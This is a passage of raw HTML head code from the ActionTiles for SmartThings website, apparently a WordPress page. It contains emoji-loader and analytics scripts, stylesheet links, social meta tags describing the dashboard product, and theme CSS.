Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://c0.wp.com/c/5.0.4/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-four-css' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css?ver=4.7.0' type='text/css' media='all' /> <style id='rs-plugin-settings-inline-css' type='text/css'> #rs-demo-id {} </style> <style id='woocommerce-inline-inline-css' type='text/css'> .woocommerce form .form-row .required { visibility: visible; } </style> <link rel='stylesheet' id='us-fonts-css' href='https://fonts.googleapis.com/css?family=Roboto%3A400%2C700&#038;subset=latin&#038;ver=f04dc3177fb921b81ffc7558dd18000d' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_facebook_likebox-css' href='https://c0.wp.com/p/jetpack/7.2.1/modules/widgets/facebook-likebox/style.css' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='https://c0.wp.com/p/jetpack/7.2.1/css/jetpack.css' type='text/css' media='all' /> <script type='text/javascript' src='https://c0.wp.com/c/5.0.4/wp-includes/js/jquery/jquery.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var gadwpUAEventsData = {"options":{"event_tracking":"1","event_downloads":"zip|mp3*|mpe*g|pdf|docx*|pptx*|xlsx*|rar*","event_bouncerate":0,"aff_tracking":0,"event_affiliates":"\/out\/","hash_tracking":0,"root_domain":"actiontiles.com","event_timeout":100,"event_precision":0,"event_formsubmit":0,"ga_pagescrolldepth_tracking":0,"ga_with_gtag":0}}; /* ]]> */ </script> <script type="text/javascript" src="https://www.actiontiles.com/wp-content/cache/minify/9f19a.js?x17256"></script> <script type='text/javascript'> /* <![CDATA[ */ var cnArgs = {"ajaxurl":"https:\/\/www.actiontiles.com\/wp-admin\/admin-ajax.php","hideEffect":"none","onScroll":"yes","onScrollOffset":"100","cookieName":"cookie_notice_accepted","cookieValue":"true","cookieTime":"2592000","cookiePath":"\/","cookieDomain":"","redirection":"","cache":"1","refuse":"no","revoke_cookies":"0","revoke_cookies_opt":"automatic","secure":"1"}; /* ]]> */ </script> <script type="text/javascript" src="https://www.actiontiles.com/wp-content/cache/minify/f8575.js?x17256"></script> <script type='text/javascript' src='https://c0.wp.com/p/woocommerce/3.4.0/assets/js/js-cookie/js.cookie.min.js'></script> <script type="text/javascript" src="https://www.actiontiles.com/wp-content/cache/minify/9aa94.js?x17256"></script> <script type='text/javascript'> /* <![CDATA[ */ var pysOptions = {"staticEvents":{"facebook":{"PageView":[{"params":[],"delay":0,"ids":[]}],"GeneralEvent":[{"params":{"post_type":"page","post_id":"5377","content_name":"ActionTiles for SmartThings"},"delay":0,"ids":[]}]}},"facebook":{"pixelIds":["751825985159581"],"advancedMatching":[],"removeMetadata":false,"contentParams":{"post_type":"page","post_id":5377,"content_name":"ActionTiles for SmartThings"},"commentEventEnabled":true,"wooVariableAsSimple":false,"downloadEnabled":true,"formEventEnabled":true},"debug":"","siteUrl":"https:\/\/www.actiontiles.com","ajaxUrl":"https:\/\/www.actiontiles.com\/wp-admin\/admin-ajax.php","commonEventParams":{"domain":"www.actiontiles.com","user_roles":"guest","plugin":"PixelYourSite"},"commentEventEnabled":"1","downloadEventEnabled":"1","downloadExtensions":["doc","exe","js","pdf","ppt","tgz","zip","xls"],"formEventEnabled":"1","gdpr":{"ajax_enabled":false,"all_disabled_by_api":false,"facebook_disabled_by_api":false,"analytics_disabled_by_api":false,"google_ads_disabled_by_api":false,"pinterest_disabled_by_api":false,"facebook_prior_consent_enabled":false,"analytics_prior_consent_enabled":true,"google_ads_prior_consent_enabled":null,"pinterest_prior_consent_enabled":true,"cookiebot_integration_enabled":false,"cookiebot_facebook_consent_category":"marketing","cookiebot_analytics_consent_category":"statistics","cookiebot_google_ads_consent_category":null,"cookiebot_pinterest_consent_category":"marketing","ginger_integration_enabled":false,"cookie_notice_integration_enabled":false,"cookie_law_info_integration_enabled":false},"woo":{"enabled":false,"addToCartOnButtonEnabled":false,"addToCartOnButtonValueEnabled":false,"addToCartOnButtonValueOption":"price","removeFromCartEnabled":true,"removeFromCartSelector":"form.woocommerce-cart-form .remove"},"edd":{"enabled":false,"addToCartOnButtonEnabled":false,"addToCartOnButtonValueEnabled":false,"addToCartOnButtonValueOption":"price","removeFromCartEnabled":true}}; /* ]]> */ </script> <script type="text/javascript" src="https://www.actiontiles.com/wp-content/cache/minify/5de18.js?x17256"></script> <link rel='https://api.w.org/' href='https://www.actiontiles.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.actiontiles.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.actiontiles.com/wp-includes/wlwmanifest.xml" /> <link rel="canonical" href="https://www.actiontiles.com/" /> <link rel='shortlink' href='https://wp.me/P85w3P-1oJ' /> <link rel="alternate" type="application/json+oembed" href="https://www.actiontiles.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.actiontiles.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.actiontiles.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.actiontiles.com%2F&#038;format=xml" /> <style type="text/css">div#toc_container {background: #f9f9f9;border: 1px solid #aaaaaa;}</style><!-- Analytics by WP-Statistics v12.6.2 - https://wp-statistics.com/ --> <script>var WP_Statistics_http = new XMLHttpRequest();WP_Statistics_http.open('POST', 'https://www.actiontiles.com/wp-json/wpstatistics/v1/hit?_=1558018094', true);WP_Statistics_http.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");WP_Statistics_http.send("wp_statistics_hit=" + JSON.stringify({"base":"https://www.actiontiles.com/wp-json","browser":"Opera","platform":"Windows","version":"10.0","referred":"https://www.youtube.com/","api":"wp-json","ip":"94.134.92.203","hash_ip":"#hash#1ddc54e2deff0d1240c00583ce8234b1b309ae9f","exclude":"","exclude_reason":"","ua":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 OPR/60.0.3255.84","track_all":"1","timestamp":"1557992894","search_query":"","current_page_type":"home","current_page_id":"5377","page_uri":"/","user_id":"0"}));</script> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <link rel='dns-prefetch' href='//i0.wp.com'/> <link rel='dns-prefetch' href='//i1.wp.com'/> <link rel='dns-prefetch' href='//i2.wp.com'/> <link rel='dns-prefetch' href='//c0.wp.com'/> <style type='text/css'>img#wpstats{display:none}</style><script type="text/javascript"> if ( ! /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) { var root = document.getElementsByTagName( 'html' )[0] root.className += " no-touch"; } </script> <noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript> <meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://www.actiontiles.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css?x17256" media="screen"><![endif]--> <style type="text/css" media="screen">#wpadminbar .shortlink-input{ color: #fff }</style> <style type="text/css"> /* If html does not have either class, do not show lazy loaded images. */ html:not( .jetpack-lazy-images-js-enabled ):not( .js ) .jetpack-lazy-image { display: none; } </style> <script> document.documentElement.classList.add( 'jetpack-lazy-images-js-enabled' ); </script> <meta name="generator" content="Powered by Slider Revolution 5.4.8 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /> <link rel="icon" href="https://i2.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/cropped-orange-grey-padded-white-bg-400.png?fit=32%2C32&#038;ssl=1" sizes="32x32" /> <link rel="icon" href="https://i2.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/cropped-orange-grey-padded-white-bg-400.png?fit=192%2C192&#038;ssl=1" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://i2.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/cropped-orange-grey-padded-white-bg-400.png?fit=180%2C180&#038;ssl=1" /> <meta name="msapplication-TileImage" content="https://i2.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/cropped-orange-grey-padded-white-bg-400.png?fit=270%2C270&#038;ssl=1" /> <script type="text/javascript">typeof jQuery!='undefined'&&jQuery(document).ready(function(a){jQuery('a').on('click',function(h){var c=jQuery(this);var d=!0;var b=c.attr('href')!==void 0?c.attr('href'):'';var e=b.replace(/^https?\:\/\//i,'').replace('www.','').split('/')[0];var f=document.domain.replace('www.','');var g=c.attr('target')!==void 0?c.attr('target'):'';if(!b.match(/^javascript:/i)){var a=[];if(a.value=0,a.non_i=!1,b.match(/^https?\:/i)&&e!==f?(a.category='external',a.action='click',a.label=b.replace(/^https?\:\/\//i,''),a.non_i=!0,a.loc=b):d=!1,d)return window._gat?_gaq.push(['_trackEvent',a.category.toLowerCase(),a.action.toLowerCase(),a.label.toLowerCase(),a.value,a.non_i]):ga('send','event',a.category.toLowerCase(),a.action.toLowerCase(),a.label.toLowerCase(),a.value),g=='_blank'?window.open(a.loc):setTimeout(function(){window.location.href=a.loc;},400),window.console&&window.console.log&&console.log('Outbound: '+a.label),!1;}});});</script> <!-- BEGIN ExactMetrics v5.3.7 Universal Analytics - https://exactmetrics.com/ --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-86809103-1', 'auto', {'allowLinker': true}); ga('require', 'linker'); ga('linker:autoLink', ['smarttiles.click']); ga('send', 'pageview'); </script> <!-- END ExactMetrics Universal Analytics --> <script type="text/javascript">function setREVStartSize(e){ try{ e.c=jQuery(e.c);var i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0; if(e.responsiveLevels&&(jQuery.each(e.responsiveLevels,function(e,f){f>i&&(t=r=f,l=e),i>f&&f>r&&(r=f,n=e)}),t>r&&(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h>1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if (c) jQuery.each(c,function(e,i){u=jQuery(i).length>0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length>1&&void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0&&(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&&f<e.minHeight&&(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f}) }catch(d){console.log("Failure at Presize of Slider:"+d)} };</script> <style type="text/css" id="wp-custom-css"> /* You can add your own CSS here. Click the help icon above to learn more. */ /*Add your own styles here:*/ .screenclip { border: 1px solid #021a40; align: top; } </style> <style type="text/css" data-type="vc_custom-css">.w-iconbox-title { line-height: 1.0; } .w-iconbox.iconpos_left .w-iconbox-icon { flex-shrink: 0; margin-right: 0.5rem; /* margin-right: calc(17px + 0.2em); */ } </style><style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1494493381844{padding-top: 6px !important;padding-bottom: 6px !important;}.vc_custom_1494493313298{padding-top: 10px !important;padding-right: 10px !important;padding-bottom: 20px !important;padding-left: 10px !important;}.vc_custom_1487676040338{margin-bottom: -30px !important;}.vc_custom_1487662940411{padding-right: 5px !important;}.vc_custom_1487709261884{padding-right: 10px !important;padding-left: 10px !important;}.vc_custom_1487662940411{padding-right: 5px !important;}.vc_custom_1487662956802{padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1510820778357{margin-top: 4px !important;padding-top: 4px !important;}.vc_custom_1510820929724{margin-bottom: 0px !important;}.vc_custom_1510820940033{margin-bottom: 0px !important;}.vc_custom_1546590248165{margin-top: 3% !important;}.vc_custom_1510819303166{padding-top: 1vh !important;padding-bottom: 1vh !important;background-color: #81d742 !important;}.vc_custom_1546590290939{margin-top: 3% !important;}.vc_custom_1487675315620{padding-top: -20px !important;}.vc_custom_1487677905587{margin-right: 1px !important;margin-left: 1px !important;padding-top: 25px !important;padding-bottom: 10px !important;background-color: #ef7613 !important;}</style><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <!-- START - Open Graph for Facebook, Google+ and Twitter Card Tags 2.2.5 --> <!-- Facebook Open Graph --> <meta property="og:locale" content="en_US"/> <meta property="og:title" content="ActionTiles for SmartThings"/> <meta property="og:url" content="https://www.actiontiles.com"/> <meta property="og:type" content="website"/> <meta property="og:description" content="The premiere custom control Panel builder web-app for SmartThings. Free trial for 14-Days of all features. Rated 4.9 Stars on Facebook. Simple one-time $28.99 price for ActionTiles V6 License per SmartThings Hub (subject to change). Unlimited users, tablets, phones, devices, dashboard Panels, and se"/> <meta property="og:image" content="https://www.actiontiles.com/wp-content/uploads/2018/03/20180301-WP-FB-Default.jpg"/> <meta property="article:publisher" content="https://www.facebook.com/ActionTiles"/> <meta property="fb:app_id" content="1665601877067221"/> <meta property="fb:admins" content="tgauchat"/> <!-- Google+ / Schema.org --> <meta itemprop="name" content="ActionTiles for SmartThings"/> <meta itemprop="headline" content="ActionTiles for SmartThings"/> <meta itemprop="description" content="The premiere custom control Panel builder web-app for SmartThings. Free trial for 14-Days of all features. Rated 4.9 Stars on Facebook. Simple one-time $28.99 price for ActionTiles V6 License per SmartThings Hub (subject to change). Unlimited users, tablets, phones, devices, dashboard Panels, and se"/> <meta itemprop="image" content="https://www.actiontiles.com/wp-content/uploads/2018/03/20180301-WP-FB-Default.jpg"/> <link rel="publisher" href="https://plus.google.com/+ActionTiles"/> <!--<meta itemprop="publisher" content="ActionTiles.com"/>--> <!-- To solve: The attribute publisher.itemtype has an invalid value --> <!-- Twitter Cards --> <meta name="twitter:title" content="ActionTiles for SmartThings"/> <meta name="twitter:url" content="https://www.actiontiles.com"/> <meta name="twitter:description" content="The premiere custom control Panel builder web-app for SmartThings. Free trial for 14-Days of all features. Rated 4.9 Stars on Facebook. Simple one-time $28.99 price for ActionTiles V6 License per SmartThings Hub (subject to change). Unlimited users, tablets, phones, devices, dashboard Panels, and se"/> <meta name="twitter:image" content="https://www.actiontiles.com/wp-content/uploads/2018/03/20180301-WP-FB-Default.jpg"/> <meta name="twitter:card" content="summary_large_image"/> <meta name="twitter:site" content="@ActionTiles"/> <!-- SEO --> <!-- Misc. tags --> <!-- is_singular --> <!-- END - Open Graph for Facebook, Google+ and Twitter Card Tags 2.2.5 --> <script async src='https://stats.wp.com/s-201920.js'></script> <style id='us-theme-options-css' type="text/css">@font-face{font-family:'FontAwesome';src:url('https://www.actiontiles.com/wp-content/themes/Zephyr/framework/fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'),url('https://www.actiontiles.com/wp-content/themes/Zephyr/framework/fonts/fontawesome-webfont.woff?v=4.7.0') format('woff');font-weight:normal;font-style:normal}.style_phone6-1>div{background-image:url(https://www.actiontiles.com/wp-content/themes/Zephyr/framework/img/phone-6-black-real.png)}.style_phone6-2>div{background-image:url(https://www.actiontiles.com/wp-content/themes/Zephyr/framework/img/phone-6-white-real.png)}.style_phone6-3>div{background-image:url(https://www.actiontiles.com/wp-content/themes/Zephyr/framework/img/phone-6-black-flat.png)}.style_phone6-4>div{background-image:url(https://www.actiontiles.com/wp-content/themes/Zephyr/framework/img/phone-6-white-flat.png)}.wc-credit-card-form-card-number.visa{background-image:url(https://www.actiontiles.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/visa.svg)}.wc-credit-card-form-card-number.mastercard{background-image:url(https://www.actiontiles.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/mastercard.svg)}.wc-credit-card-form-card-number.discover{background-image:url(https://www.actiontiles.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/discover.svg)}.wc-credit-card-form-card-number.amex{background-image:url(https://www.actiontiles.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/amex.svg)}.wc-credit-card-form-card-number.maestro{background-image:url(https://www.actiontiles.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/maestro.svg)}.wc-credit-card-form-card-number.jcb{background-image:url(https://www.actiontiles.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/jcb.svg)}.wc-credit-card-form-card-number.dinersclub{background-image:url(https://www.actiontiles.com/wp-content/plugins/woocommerce/assets/images/icons/credit-cards/diners.svg)}html,.w-nav .widget{font-family:"Roboto", sans-serif;font-size:16px;line-height:18px;font-weight:400}.w-text.font_main_menu,.w-nav-list.level_1{font-family:"Roboto", sans-serif;font-weight:400}h1, h2, h3, h4, h5, h6,.w-text.font_heading,.w-blog-post.format-quote blockquote,.w-counter-number,.w-pricing-item-price,.w-tabs-item-title,.stats-block .stats-desc .stats-number{font-family:"Roboto", sans-serif;font-weight:400}h1{font-size:40px;font-weight:400;letter-spacing:0em}h2{font-size:34px;font-weight:400;letter-spacing:0em}h3{font-size:28px;font-weight:400;letter-spacing:0em}h4,.widgettitle,.comment-reply-title,.woocommerce #reviews h2,.woocommerce .related>h2,.woocommerce .upsells>h2,.woocommerce .cross-sells>h2{font-size:24px;font-weight:400;letter-spacing:0em}h5{font-size:20px;font-weight:400;letter-spacing:0em}h6{font-size:18px;font-weight:400;letter-spacing:0em}@media (max-width:767px){html{font-size:16px;line-height:18px}h1{font-size:30px}h1.vc_custom_heading{font-size:30px !important}h2{font-size:26px}h2.vc_custom_heading{font-size:26px !important}h3{font-size:24px}h3.vc_custom_heading{font-size:24px !important}h4,.widgettitle,.comment-reply-title,.woocommerce #reviews h2,.woocommerce .related>h2,.woocommerce .upsells>h2,.woocommerce .cross-sells>h2{font-size:22px}h4.vc_custom_heading{font-size:22px !important}h5{font-size:20px}h5.vc_custom_heading{font-size:20px !important}h6{font-size:18px}h6.vc_custom_heading{font-size:18px !important}}body,.header_hor .l-header.pos_fixed{min-width:1200px}.l-canvas.type_boxed,.l-canvas.type_boxed .l-subheader,.l-canvas.type_boxed .l-section.type_sticky,.l-canvas.type_boxed~.l-footer{max-width:1200px}.header_hor .l-subheader-h,.l-titlebar-h,.l-main-h,.l-section-h,.w-tabs-section-content-h,.w-blog-post-body{max-width:1100px}@media (max-width:1250px){.l-section:not(.width_full) .owl-nav{display:none}}@media (max-width:1300px){.l-section:not(.width_full) .w-blog .owl-nav{display:none}}.l-sidebar{width:25%}.l-content{width:68%}@media (max-width:767px){.g-cols>div:not([class*=" vc_col-"]){clear:both;float:none;width:100%;margin:0 0 2rem}.g-cols.type_boxes>div,.g-cols>div:last-child,.g-cols>div.has-fill{margin-bottom:0}.vc_wp_custommenu.layout_hor,.align_center_xs,.align_center_xs .w-socials{text-align:center}}@media screen and (max-width:1200px){.w-portfolio.cols_3 .w-portfolio-item{width:33.333333333333%}.w-portfolio.cols_3 .w-portfolio-item.size_2x1,.w-portfolio.cols_3 .w-portfolio-item.size_2x2{width:66.666666666667%}.w-portfolio.cols_4 .w-portfolio-item{width:33.333333333333%}.w-portfolio.cols_4 .w-portfolio-item.size_2x1,.w-portfolio.cols_4 .w-portfolio-item.size_2x2{width:66.666666666667%}.w-portfolio.cols_5 .w-portfolio-item{width:33.333333333333%}.w-portfolio.cols_5 .w-portfolio-item.size_2x1,.w-portfolio.cols_5 .w-portfolio-item.size_2x2{width:66.666666666667%}.w-portfolio.cols_6 .w-portfolio-item{width:33.333333333333%}.w-portfolio.cols_6 .w-portfolio-item.size_2x1,.w-portfolio.cols_6 .w-portfolio-item.size_2x2{width:66.666666666667%}}@media screen and (max-width:900px){.w-portfolio.cols_2 .w-portfolio-item{width:50%}.w-portfolio.cols_2 .w-portfolio-item.size_2x1,.w-portfolio.cols_2 .w-portfolio-item.size_2x2{width:100%}.w-portfolio.cols_3 .w-portfolio-item{width:50%}.w-portfolio.cols_3 .w-portfolio-item.size_2x1,.w-portfolio.cols_3 .w-portfolio-item.size_2x2{width:100%}.w-portfolio.cols_4 .w-portfolio-item{width:50%}.w-portfolio.cols_4 .w-portfolio-item.size_2x1,.w-portfolio.cols_4 .w-portfolio-item.size_2x2{width:100%}.w-portfolio.cols_5 .w-portfolio-item{width:50%}.w-portfolio.cols_5 .w-portfolio-item.size_2x1,.w-portfolio.cols_5 .w-portfolio-item.size_2x2{width:100%}.w-portfolio.cols_6 .w-portfolio-item{width:50%}.w-portfolio.cols_6 .w-portfolio-item.size_2x1,.w-portfolio.cols_6 .w-portfolio-item.size_2x2{width:100%}}@media screen and (max-width:600px){.w-portfolio.cols_1 .w-portfolio-item{width:100%}.w-portfolio.cols_2 .w-portfolio-item{width:100%}.w-portfolio.cols_3 .w-portfolio-item{width:100%}.w-portfolio.cols_4 .w-portfolio-item{width:100%}.w-portfolio.cols_5 .w-portfolio-item{width:100%}.w-portfolio.cols_6 .w-portfolio-item{width:100%}}@media screen and (max-width:1200px){.w-blog.cols_3 .w-blog-post{width:33.333333333333%}.w-blog.cols_4 .w-blog-post{width:33.333333333333%}.w-blog.cols_5 .w-blog-post{width:33.333333333333%}.w-blog.cols_6 .w-blog-post{width:33.333333333333%}}@media screen and (max-width:900px){.w-blog.cols_2 .w-blog-post{width:50%}.w-blog.cols_3 .w-blog-post{width:50%}.w-blog.cols_4 .w-blog-post{width:50%}.w-blog.cols_5 .w-blog-post{width:50%}.w-blog.cols_6 .w-blog-post{width:50%}}@media screen and (max-width:600px){.w-blog.cols_1 .w-blog-post{width:100%}.w-blog.cols_2 .w-blog-post{width:100%}.w-blog.cols_3 .w-blog-post{width:100%}.w-blog.cols_4 .w-blog-post{width:100%}.w-blog.cols_5 .w-blog-post{width:100%}.w-blog.cols_6 .w-blog-post{width:100%}}.w-header-show,.w-toplink{background-color:rgba(0,0,0,0.3)}body{background-color:#e0e0e0;-webkit-tap-highlight-color:rgba(239,108,0,0.2)}.l-subheader.at_top,.l-subheader.at_top .w-dropdown-list,.l-subheader.at_top .type_mobile .w-nav-list.level_1{background-color:#ffffff}.l-subheader.at_top,.l-subheader.at_top .w-dropdown.active,.l-subheader.at_top .type_mobile .w-nav-list.level_1{color:#424242}.no-touch .l-subheader.at_top a:hover,.no-touch .l-header.bg_transparent .l-subheader.at_top .w-dropdown.active a:hover{color:#000000}.header_ver .l-header,.header_hor .l-subheader.at_middle,.l-subheader.at_middle .w-dropdown-list,.l-subheader.at_middle .type_mobile .w-nav-list.level_1{background-color:#ffffff}.l-subheader.at_middle,.l-subheader.at_middle .w-dropdown.active,.l-subheader.at_middle .type_mobile .w-nav-list.level_1{color:#424242}.no-touch .l-subheader.at_middle a:hover,.no-touch .l-header.bg_transparent .l-subheader.at_middle .w-dropdown.active a:hover{color:#ef6c00}.l-subheader.at_bottom,.l-subheader.at_bottom .w-dropdown-list,.l-subheader.at_bottom .type_mobile .w-nav-list.level_1{background-color:}.l-subheader.at_bottom,.l-subheader.at_bottom .w-dropdown.active,.l-subheader.at_bottom .type_mobile .w-nav-list.level_1{color:#000000}.no-touch .l-subheader.at_bottom a:hover,.no-touch .l-header.bg_transparent .l-subheader.at_bottom .w-dropdown.active a:hover{color:#000000}.l-header.bg_transparent:not(.sticky) .l-subheader{color:#000000}.no-touch .l-header.bg_transparent:not(.sticky) a:not(.w-nav-anchor):hover,.no-touch .l-header.bg_transparent:not(.sticky) .type_desktop .menu-item.level_1:hover>.w-nav-anchor{color:#000000}.l-header.bg_transparent:not(.sticky) .w-nav-title:after{background-color:#000000}.w-search-form{background-color:#000000;color:#000000}.w-search.layout_fullscreen .w-search-background{background-color:#000000}.w-search.layout_fullscreen input:focus + .w-form-row-field-bar:before,.w-search.layout_fullscreen input:focus + .w-form-row-field-bar:after{background-color:#000000}.no-touch .menu-item.level_1:hover>.w-nav-anchor{background-color:#ffffff;color:#e65100}.w-nav-title:after{background-color:#e65100}.menu-item.level_1.current-menu-item>.w-nav-anchor,.menu-item.level_1.current-menu-parent>.w-nav-anchor,.menu-item.level_1.current-menu-ancestor>.w-nav-anchor{background-color:;color:#ef6c00}.l-header.bg_transparent:not(.sticky) .type_desktop .menu-item.level_1.current-menu-item>.w-nav-anchor,.l-header.bg_transparent:not(.sticky) .type_desktop .menu-item.level_1.current-menu-ancestor>.w-nav-anchor{color:#ef6c00}.w-nav-list:not(.level_1){background-color:#ffffff;color:#424242}.w-nav-anchor:not(.level_1) .ripple{background-color:#424242}.no-touch .menu-item:not(.level_1):hover>.w-nav-anchor{background-color:#eeeeee;color:#212121}.menu-item:not(.level_1).current-menu-item>.w-nav-anchor,.menu-item:not(.level_1).current-menu-parent>.w-nav-anchor,.menu-item:not(.level_1).current-menu-ancestor>.w-nav-anchor{background-color:#f7f7f7;color:#ef6c00}.w-cart-quantity,.btn.w-menu-item,.btn.menu-item.level_1>a,.l-footer .vc_wp_custommenu.layout_hor .btn>a{background-color:#ffffff !important;color:#ef6c00 !important}.no-touch .btn.w-menu-item:hover,.no-touch .btn.menu-item.level_1>a:hover,.no-touch .l-footer .vc_wp_custommenu.layout_hor .btn>a:hover{background-color:#ffffff !important;color:#e65100 !important}body.us_iframe,.l-preloader,.l-canvas,.l-footer,.l-popup-box-content,.w-blog.layout_flat .w-blog-post-h,.w-cart-dropdown,.w-pricing.style_1 .w-pricing-item-h,.w-person.layout_card,.select2-dropdown,.us-woo-shop_modern .product-h,.no-touch .us-woo-shop_modern .product-meta,.woocommerce #payment .payment_box,.wpcf7-form-control-wrap.type_select:after{background-color:#ffffff}.woocommerce #payment .payment_methods li>input:checked + label,.woocommerce .blockUI.blockOverlay{background-color:#ffffff !important}button.w-btn.color_contrast.style_raised,a.w-btn.color_contrast.style_raised,.w-iconbox.style_circle.color_contrast .w-iconbox-icon{color:#ffffff}.l-section.color_alternate,.l-titlebar.color_alternate,.l-section.for_blogpost .w-blog-post-preview,.l-section.for_related>.l-section-h,.l-canvas.sidebar_none .l-section.for_comments,.w-actionbox.color_light,.w-author,.w-blog.layout_latest .w-blog-post-meta-date,.no-touch .w-btn.style_flat:hover,.no-touch .pagination a.page-numbers:hover,.g-filters-item .ripple,.w-form.for_protected,.w-iconbox.style_circle.color_light .w-iconbox-icon,.g-loadmore-btn,.no-touch .owl-prev:hover,.no-touch .owl-next:hover,.w-profile,.w-pricing.style_1 .w-pricing-item-header,.w-pricing.style_2 .w-pricing-item-h,.w-progbar-bar,.w-progbar.style_3 .w-progbar-bar:before,.w-progbar.style_3 .w-progbar-bar-count,.l-main .w-socials-item-link,.w-tabs-item .ripple,.w-tabs.layout_timeline .w-tabs-item,.w-tabs.layout_timeline .w-tabs-section-header-h,.w-testimonials.style_1 .w-testimonial-h,.widget_calendar #calendar_wrap,.no-touch .l-main .widget_nav_menu a:hover,.select2-selection__choice,.woocommerce .login,.woocommerce .track_order,.woocommerce .checkout_coupon,.woocommerce .lost_reset_password,.woocommerce .register,.no-touch .us-woo-shop_modern .product-h .button:hover,.woocommerce .comment-respond,.woocommerce .cart_totals,.no-touch .woocommerce .product-remove a:hover,.woocommerce .checkout #order_review,.woocommerce ul.order_details,.widget_shopping_cart,.smile-icon-timeline-wrap .timeline-wrapper .timeline-block,.smile-icon-timeline-wrap .timeline-feature-item.feat-item{background-color:#e5e5e5}.timeline-wrapper .timeline-post-right .ult-timeline-arrow l,.timeline-wrapper .timeline-post-left .ult-timeline-arrow l,.timeline-feature-item.feat-item .ult-timeline-arrow l{border-color:#e5e5e5}hr,td,th,input,textarea,select,.l-section,.vc_column_container,.vc_column-inner,.w-form-row-field input:focus,.w-form-row-field textarea:focus,.widget_search input[type="text"]:focus,.w-image,.w-separator,.w-sharing-item,.w-tabs-list,.w-tabs-section,.w-tabs-section-header:before,.l-main .widget_nav_menu .menu,.l-main 